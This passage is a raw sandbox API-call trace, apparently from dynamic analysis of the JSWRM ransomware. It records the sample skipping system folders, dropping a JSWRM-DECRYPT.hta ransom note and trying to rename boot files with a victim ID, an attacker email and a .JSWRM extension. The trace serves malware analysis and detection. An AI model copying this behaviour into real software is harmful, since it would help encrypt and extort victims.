lpWideCharStr="9A8I36E") returned 8 [0063.770] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a300 | out: hHeap=0x1e0000) returned 1 [0063.770] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22bf60 [0063.770] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x76) returned 0x225e30 [0063.770] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22bf60 | out: hHeap=0x1e0000) returned 1 [0063.770] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2363b0 [0063.770] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225e30 | out: hHeap=0x1e0000) returned 1 [0063.770] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8638 | out: hHeap=0x1e0000) returned 1 [0063.770] MoveFileW (lpExistingFileName="C:\\Boot\\en-US\\memtest.exe.mui" (normalized: "c:\\boot\\en-us\\memtest.exe.mui"), lpNewFileName="C:\\Boot\\en-US\\memtest.exe.mui.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\boot\\en-us\\memtest.exe.mui.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 0 [0063.770] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2363b0 | out: hHeap=0x1e0000) returned 1 [0063.770] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20de78 | out: hHeap=0x1e0000) returned 1 [0063.770] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e418 | out: hHeap=0x1e0000) returned 1 [0063.770] FindNextFileW (in: hFindFile=0x232100, lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4853f40, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef57d0f5, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf3a246aa, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0xafa0, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 0 [0063.770] FindClose (in: hFindFile=0x232100 | out: hFindFile=0x232100) returned 1 [0063.770] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e268 | out: hHeap=0x1e0000) returned 1 [0063.770] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241290 | out: hHeap=0x1e0000) returned 1 [0063.770] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241358 | out: hHeap=0x1e0000) returned 1 [0063.770] FindNextFileW (in: hFindFile=0x231d00, lpFindFileData=0x345f6c8 | out: lpFindFileData=0x345f6c8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4853f40, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa000b9ad, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef586d37, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfffffffe, dwReserved1=0x345f828, cFileName="es-ES", cAlternateFileName="")) returned 1 [0063.770] lstrcmpiW (lpString1="es-ES", lpString2=".") returned 1 [0063.770] lstrcmpiW (lpString1="es-ES", lpString2="..") returned 1 [0063.770] lstrcmpiW (lpString1="es-ES", lpString2="...") returned 1 [0063.771] lstrcmpiW (lpString1="es-ES", lpString2="windows") returned -1 [0063.771] lstrcmpiW (lpString1="es-ES", lpString2="recovery") returned -1 [0063.771] lstrcmpiW (lpString1="es-ES", lpString2="perflogs") returned -1 [0063.771] lstrcmpiW (lpString1="es-ES", lpString2="documents and settings") returned 1 [0063.771] lstrcmpiW (lpString1="es-ES", lpString2="$RECYCLE.BIN") returned 1 [0063.771] lstrcmpiW (lpString1="es-ES", lpString2="system volume information") returned -1 [0063.771] lstrcmpiW (lpString1="es-ES", lpString2="msocache") returned -1 [0063.771] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0063.771] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412e0 | out: hHeap=0x1e0000) returned 1 [0063.771] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f20 [0063.771] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0063.771] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x46) returned 0x237448 [0063.771] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0063.771] GetFileAttributesW (lpFileName="C:\\Boot\\es-ES\\JSWRM-DECRYPT.hta" (normalized: "c:\\boot\\es-es\\jswrm-decrypt.hta")) returned 0xffffffff [0063.771] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x237448 | out: hHeap=0x1e0000) returned 1 [0063.771] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0063.771] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345c52c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0063.771] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240ef8 [0063.771] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1dc3) returned 0x23cc80 [0063.772] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240ef8 | out: hHeap=0x1e0000) returned 1 [0063.772] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2c92) returned 0x2471a8 [0063.772] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cc80 | out: hHeap=0x1e0000) returned 1 [0063.772] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8638 [0063.772] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x46) returned 0x236f48 [0063.772] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8638 | out: hHeap=0x1e0000) returned 1 [0063.772] CreateFileW (lpFileName="C:\\Boot\\es-ES\\JSWRM-DECRYPT.hta" (normalized: "c:\\boot\\es-es\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x450 [0063.772] SetFilePointer (in: hFile=0x450, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0063.772] WriteFile (in: hFile=0x450, lpBuffer=0x345c640*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345c60c, lpOverlapped=0x0 | out: lpBuffer=0x345c640*, lpNumberOfBytesWritten=0x345c60c*=0x230c, lpOverlapped=0x0) returned 1 [0063.773] CloseHandle (hObject=0x450) returned 1 [0063.773] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236f48 | out: hHeap=0x1e0000) returned 1 [0063.773] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2471a8 | out: hHeap=0x1e0000) returned 1 [0063.774] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f20 | out: hHeap=0x1e0000) returned 1 [0063.774] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241010 [0063.774] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f70 [0063.774] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241380 [0063.774] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0063.774] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x46) returned 0x237588 [0063.774] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0063.774] GetFileAttributesW (lpFileName="C:\\Boot\\es-ES\\JSWRM-DECRYPT.hta" (normalized: "c:\\boot\\es-es\\jswrm-decrypt.hta")) returned 0x20 [0063.774] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x237588 | out: hHeap=0x1e0000) returned 1 [0063.774] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241380 | out: hHeap=0x1e0000) returned 1 [0063.774] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0063.774] FindFirstFileW (in: lpFileName="C:\\Boot\\es-ES\\*.*", lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4853f40, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa000b9ad, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1cad1b08, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName=".", cAlternateFileName="")) returned 0x232100 [0063.775] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0063.775] FindNextFileW (in: hFindFile=0x232100, lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4853f40, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa000b9ad, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1cad1b08, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="..", cAlternateFileName="")) returned 1 [0063.775] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0063.775] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0063.775] FindNextFileW (in: hFindFile=0x232100, lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4853f40, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc4853f40, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0x209949ab, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12f60, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0063.775] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2=".") returned 1 [0063.775] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="..") returned 1 [0063.775] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="...") returned 1 [0063.775] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="windows") returned -1 [0063.775] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="recovery") returned -1 [0063.775] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="perflogs") returned -1 [0063.775] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="documents and settings") returned -1 [0063.775] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="$RECYCLE.BIN") returned 1 [0063.775] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="system volume information") returned -1 [0063.775] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="msocache") returned -1 [0063.775] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241100 [0063.775] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="bootmgr.exe.mui", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0063.775] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="bootmgr.exe.mui", cchWideChar=15, lpMultiByteStr=0x345f610, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bootmgr.exe.mui", lpUsedDefaultChar=0x0) returned 15 [0063.775] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241100 | out: hHeap=0x1e0000) returned 1 [0063.775] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241060 [0063.775] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="bootmgr.exe.mui", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0063.775] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="bootmgr.exe.mui", cchWideChar=15, lpMultiByteStr=0x345f5e0, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bootmgr.exe.mui", lpUsedDefaultChar=0x0) returned 15 [0063.775] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241060 | out: hHeap=0x1e0000) returned 1 [0063.776] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20e418 [0063.776] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0063.776] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0063.776] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345f334, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0063.776] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20de78 [0063.776] CreateFileW (lpFileName="C:\\Boot\\es-ES\\bootmgr.exe.mui" (normalized: "c:\\boot\\es-es\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0063.776] GetFileSizeEx (in: hFile=0xffffffff, lpFileSize=0x345f2c8 | out: lpFileSize=0x345f2c8*=9257990987243128) returned 0 [0063.776] SetFilePointer (in: hFile=0xffffffff, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0063.776] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x2471a8 [0063.777] ReadFile (in: hFile=0xffffffff, lpBuffer=0x2471a8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345f2d4, lpOverlapped=0x0 | out: lpBuffer=0x2471a8, lpNumberOfBytesRead=0x345f2d4*=0x0, lpOverlapped=0x0) returned 0 [0063.777] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2471a8 | out: hHeap=0x1e0000) returned 1 [0063.777] CloseHandle (hObject=0xffffffff) returned 1 [0063.777] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dec0 [0063.777] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0063.777] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0063.777] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x1f8328, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0063.777] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f87c0 [0063.777] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0063.777] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0063.777] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a360 [0063.777] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a360, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0063.777] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a360 | out: hHeap=0x1e0000) returned 1 [0063.777] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c538 [0063.777] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x76) returned 0x226430 [0063.777] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c538 | out: hHeap=0x1e0000) returned 1 [0063.777] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236690 [0063.777] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x226430 | out: hHeap=0x1e0000) returned 1 [0063.777] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f87c0 | out: hHeap=0x1e0000) returned 1 [0063.777] MoveFileW (lpExistingFileName="C:\\Boot\\es-ES\\bootmgr.exe.mui" (normalized: "c:\\boot\\es-es\\bootmgr.exe.mui"), lpNewFileName="C:\\Boot\\es-ES\\bootmgr.exe.mui.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\boot\\es-es\\bootmgr.exe.mui.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 0 [0063.777] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236690 | out: hHeap=0x1e0000) returned 1 [0063.777] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dec0 | out: hHeap=0x1e0000) returned 1 [0063.777] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20de78 | out: hHeap=0x1e0000) returned 1 [0063.777] FindNextFileW (in: hFindFile=0x232100, lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1cad1b08, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x1cad1b08, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x1cad1b08, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0063.777] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2=".") returned 1 [0063.777] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="..") returned 1 [0063.777] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="...") returned 1 [0063.777] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="windows") returned -1 [0063.778] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="recovery") returned -1 [0063.778] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="perflogs") returned -1 [0063.778] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="documents and settings") returned 1 [0063.778] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="$RECYCLE.BIN") returned 1 [0063.778] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="system volume information") returned -1 [0063.778] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="msocache") returned -1 [0063.778] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0063.778] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0063.778] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241100 [0063.778] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x241100, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0063.778] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0063.778] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8638 [0063.778] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0063.778] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0063.778] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x2411c8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0063.778] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8638 | out: hHeap=0x1e0000) returned 1 [0063.778] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20de78 [0063.778] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e418 | out: hHeap=0x1e0000) returned 1 [0063.778] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0063.778] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241100 | out: hHeap=0x1e0000) returned 1 [0063.778] FindNextFileW (in: hFindFile=0x232100, lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4853f40, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef586d37, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf3a246aa, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0xb3a0, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 1 [0063.778] lstrcmpiW (lpString1="memtest.exe.mui", lpString2=".") returned 1 [0063.778] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="..") returned 1 [0063.778] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="...") returned 1 [0063.778] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="windows") returned -1 [0063.778] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="recovery") returned -1 [0063.778] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="perflogs") returned -1 [0063.778] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="documents and settings") returned 1 [0063.778] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="$RECYCLE.BIN") returned 1 [0063.778] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="system volume information") returned -1 [0063.778] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="msocache") returned -1 [0063.778] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413a8 [0063.778] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="memtest.exe.mui", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0063.778] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="memtest.exe.mui", cchWideChar=15, lpMultiByteStr=0x345f610, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="memtest.exe.mui", lpUsedDefaultChar=0x0) returned 15 [0063.779] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413a8 | out: hHeap=0x1e0000) returned 1 [0063.779] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241380 [0063.779] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="memtest.exe.mui", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0063.779] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="memtest.exe.mui", cchWideChar=15, lpMultiByteStr=0x345f5e0, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="memtest.exe.mui", lpUsedDefaultChar=0x0) returned 15 [0063.779] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241380 | out: hHeap=0x1e0000) returned 1 [0063.779] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20e418 [0063.779] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20de78 | out: hHeap=0x1e0000) returned 1 [0063.779] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0063.779] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345f334, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0063.779] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20e268 [0063.779] CreateFileW (lpFileName="C:\\Boot\\es-ES\\memtest.exe.mui" (normalized: "c:\\boot\\es-es\\memtest.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0063.779] GetFileSizeEx (in: hFile=0xffffffff, lpFileSize=0x345f2c8 | out: lpFileSize=0x345f2c8*=9257990987244136) returned 0 [0063.779] SetFilePointer (in: hFile=0xffffffff, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0063.780] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x2471a8 [0063.780] ReadFile (in: hFile=0xffffffff, lpBuffer=0x2471a8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345f2d4, lpOverlapped=0x0 | out: lpBuffer=0x2471a8, lpNumberOfBytesRead=0x345f2d4*=0x0, lpOverlapped=0x0) returned 0 [0063.780] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2471a8 | out: hHeap=0x1e0000) returned 1 [0063.780] CloseHandle (hObject=0xffffffff) returned 1 [0063.780] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20de78 [0063.780] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, 